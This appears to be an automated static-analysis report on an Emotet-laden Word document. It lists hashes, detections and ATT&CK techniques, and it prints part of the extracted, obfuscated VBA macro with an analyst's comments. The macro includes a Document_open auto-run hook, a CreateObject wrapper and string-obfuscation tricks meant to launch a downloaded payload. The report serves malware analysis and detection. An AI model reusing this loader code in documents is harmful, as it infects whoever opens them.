Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 6f26773110686378…

MALICIOUS

Office (OLE)

142.8 KB Created: 2020-10-15 06:34:00 Authoring application: Microsoft Office Word
MD5: ddfa8bc337a6a1b32f8f991ad4799c0d SHA-1: 32ec1f6867bf511faf09de0baf0970674267566e SHA-256: 6f267731106863785ee046604bcb54eb973888383e35991aa646fcc5b9bb9314
202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample contains VBA macros, specifically a Document_Open macro whose call chain reaches CreateObject, indicating an attempt to execute arbitrary code when the document is opened. The ClamAV detection 'Doc.Downloader.Emotet-9778165-0' strongly suggests the Emotet family. The VBA script's primary function appears to be downloading and executing a secondary payload, a tactic characteristic of Emotet.

Heuristics 6

  • ClamAV: Doc.Downloader.Emotet-9778165-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-9778165-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose macro source failed to extract, where no visible source is available.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. A URL by itself is not a detection — consult the per-URL labels to see which channel (macro, JS, link annotation, document body, ...) referenced each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is a standard Office Open XML schema namespace identifier, not a download location.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas
aa3822bbb419da819c0009ca2a50458591c2a917d376ecb16e3e87f227973bcb
vba-macro oletools.olevba.extract_macros (decoded VBA source) 10774 bytes
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "C36qwyoi5aq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: Word invokes Document_open when the document
' is opened. Its sole statement calls Aiei4ftiuv3b in module
' Fvpfw4ruu27u65_et, so all of the macro's real behaviour lives there.
Private Sub Document_open()
Fvpfw4ruu27u65_et.Aiei4ftiuv3b
End Sub

Attribute VB_Name = "F2udz5z_ag37c7v"
' Thin wrapper around Join(): concatenates the elements of the array passed
' in Wlnsrkqx8prxmqba1a, using I03ebne9p2axgk as the delimiter, and returns
' the resulting string.
' I03ebne9p2axgk is not declared or assigned anywhere in the visible source.
' With no Option Explicit and On Error Resume Next it presumably evaluates to
' Empty (an empty delimiter), so this would simply glue split fragments back
' together — TODO confirm against the full extracted module set.
' Every ReDim'd array below is assigned and never read in this function:
' dead filler code, not part of the logic.
Function Nv1c_15b7oobuwh(Wlnsrkqx8prxmqba1a)
On Error Resume Next
   ReDim TviHMN(2)
TviHMN(0) = 946 + 9 + 5 + 2166 + 79571
TviHMN(1) = 134 + 568 + 254 + 11 + 3
ReDim awkHa(3)
awkHa(0) = 6 + 5 + 2521 + 5917 + 51
awkHa(1) = 8226 + 4789 + 168 + 3 + 51
awkHa(2) = 56 + 9572 + 9 + 3 + 4654
ReDim ydsBGAm(2)
ydsBGAm(0) = 97 + 137 + 3 + 8 + 85191
ydsBGAm(1) = 5164 + 3 + 527 + 4 + 7
' The only statement that affects the return value.
Nv1c_15b7oobuwh = Join(Wlnsrkqx8prxmqba1a, I03ebne9p2axgk)
   ReDim SHfJdE(3)
SHfJdE(0) = 2 + 468 + 4946 + 388 + 291
SHfJdE(1) = 69 + 612 + 2585 + 86 + 571
SHfJdE(2) = 12 + 7 + 4 + 7018 + 111
ReDim JljUDNJNW(2)
JljUDNJNW(0) = 904 + 177 + 2 + 2 + 11
JljUDNJNW(1) = 446 + 489 + 5464 + 617 + 943
ReDim qZkXII(1)
qZkXII(0) = 69 + 70 + 2389 + 764 + 6
End Function
' Thin wrapper around CreateObject(): instantiates the COM object named by
' the string in Kzdao4jkbsz and returns it. The ProgID/moniker is supplied by
' the caller, so which class actually gets created cannot be determined from
' this function alone. Because of On Error Resume Next, a failed
' CreateObject does not raise; the function then returns Nothing.
' Every ReDim'd array below is assigned and never read: dead filler code.
Function Invdvxc0ig7vu4hps(Kzdao4jkbsz)
On Error Resume Next
   ReDim iuWSMmRDj(3)
iuWSMmRDj(0) = 365 + 7342 + 1 + 3 + 3401
iuWSMmRDj(1) = 318 + 1 + 1 + 7 + 1321
iuWSMmRDj(2) = 48 + 686 + 6 + 8913 + 6630
ReDim IiTPuJ(1)
IiTPuJ(0) = 26 + 331 + 7 + 76 + 85
ReDim ANCIFHD(3)
ANCIFHD(0) = 927 + 787 + 48 + 9451 + 2921
ANCIFHD(1) = 3 + 8326 + 66 + 54 + 541
ANCIFHD(2) = 584 + 516 + 8492 + 5165 + 293
' The only functional statement in this procedure.
Set Invdvxc0ig7vu4hps = CreateObject(Kzdao4jkbsz)
   ReDim cllhQiAJ(2)
cllhQiAJ(0) = 7 + 913 + 35 + 254 + 61
cllhQiAJ(1) = 5912 + 6722 + 9199 + 801 + 1584
ReDim cmNMSqECB(3)
cmNMSqECB(0) = 94 + 26 + 4086 + 688 + 81
cmNMSqECB(1) = 71 + 109 + 12 + 265 + 11
cmNMSqECB(2) = 9728 + 221 + 2 + 714 + 7
ReDim QqRcQBmL(3)
QqRcQBmL(0) = 17 + 43 + 6 + 6 + 21
QqRcQBmL(1) = 8 + 9 + 15 + 9 + 171
QqRcQBmL(2) = 9 + 4 + 4225 + 178 + 402
End Function
' Thin wrapper around Split(): breaks the string in Paxwyv2f721eh into an
' array on the literal delimiter "=uKNBSYw".
' That same token is interleaved into the string constants assembled in
' module Fvpfw4ruu27u65_et (e.g. "=uKNBSYwro=uKNBSYw=uKNBSYwce=uKNBSYws..."),
' so splitting on it and re-joining the pieces with an empty delimiter strips
' the filler; the visible literal in that module reduces to "rocess", with
' its prefix and suffix coming from variables not shown in this listing.
' Detection note: the fixed token "=uKNBSYw" is a usable static indicator
' for this particular build of the macro.
' Every ReDim'd array below is assigned and never read: dead filler code.
Function M2g62vf646rjb79xz(Paxwyv2f721eh)
On Error Resume Next
   ReDim kioDH(2)
kioDH(0) = 934 + 38 + 728 + 2 + 9761
kioDH(1) = 6 + 36 + 2 + 812 + 3
ReDim ILoZEcn(2)
ILoZEcn(0) = 64 + 1 + 59 + 617 + 11
ILoZEcn(1) = 1 + 5 + 443 + 4 + 907
ReDim BPTUC(2)
BPTUC(0) = 3 + 3 + 52 + 6 + 91
BPTUC(1) = 6869 + 93 + 5 + 637 + 10
' The only statement that affects the return value.
M2g62vf646rjb79xz = Split(Paxwyv2f721eh, "=uKNBSYw")
   ReDim xGMMDFIWG(3)
xGMMDFIWG(0) = 2406 + 410 + 52 + 3 + 61
xGMMDFIWG(1) = 2 + 6 + 80 + 540 + 66841
xGMMDFIWG(2) = 15 + 327 + 8 + 1 + 2
ReDim gJlAEF(1)
gJlAEF(0) = 7030 + 1 + 325 + 1 + 54
ReDim YeJoLs(1)
YeJoLs(0) = 7044 + 21 + 6 + 30 + 2104
End Function

Attribute VB_Name = "Fvpfw4ruu27u65_et"
Attribute VB_Base = "0{4271DA0E-52DA-4D8D-99B7-EEE2D7B14DF3}{0E2A116A-BF36-4853-A453-279196DF29B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Aiei4ftiuv3b()
On Error Resume Next
   ReDim dwvfSAS(1)
dwvfSAS(0) = 5529 + 3 + 2327 + 33 + 7
ReDim CTDsvw(2)
CTDsvw(0) = 609 + 202 + 8 + 6408 + 7651
CTDsvw(1) = 1 + 3 + 2 + 6 + 7
ReDim bDKhDCI(2)
bDKhDCI(0) = 6 + 33 + 63 + 15 + 42951
bDKhDCI(1) = 1243 + 94 + 7884 + 37 + 2
Max_9buif6cvev1pe = Dubcqthbvk16542 + "=uKNBSYwro=uKNBSYw=uKNBSYwce=uKNBSYws=uKNBSYws=uKNBSYw" + Rr4jub9t2t0qf
   ReDim vbNGMGFcG(3)
vbNGMGFcG(0) = 4 + 825 + 7047 + 5836 + 591
vbNGMGFcG(1) = 8 + 4 + 7 + 2 + 54521
vbNGMGFcG(2) = 51 + 639 + 6 + 683 + 1
ReDim iPJcA(1)
iPJcA(0) = 1900 + 6 + 5 + 80 + 636
ReDim OExaZBX(1)
OExaZBX(0) = 2 + 3 + 7464 + 6790 + 4
Ak8knvj9g74fw = Fsmh5w9h3cd + "=uKNBSYw=uKNBSYw:=uKNBSYww=uKNBSYwin=uKNBSYw=uKNBSYw3=uKNBSYw2=uKNBSYw_=uKNBSYw" + N8_7rfso_7utcdwtm
   ReDim XgLwq(2)
XgLwq(0) = 5 + 558 + 890 + 4 + 311
XgLwq(1) = 7862 + 37 + 1 + 4 + 6
ReDim JFAdOHOs(1)
JFAdOHOs(0) = 3 + 7 + 82 + 4 + 5
ReDim ouQtFI(3)
ouQtFI(0) = 3 + 9118 + 64 + 293 + 1941
ouQtFI(1) = 21 + 9 + 418 + 417 + 401
ouQtFI(2) = 95 + 7 + 9 + 271 + 8768
Paxwyv2f721eh = P37rch
... (truncated)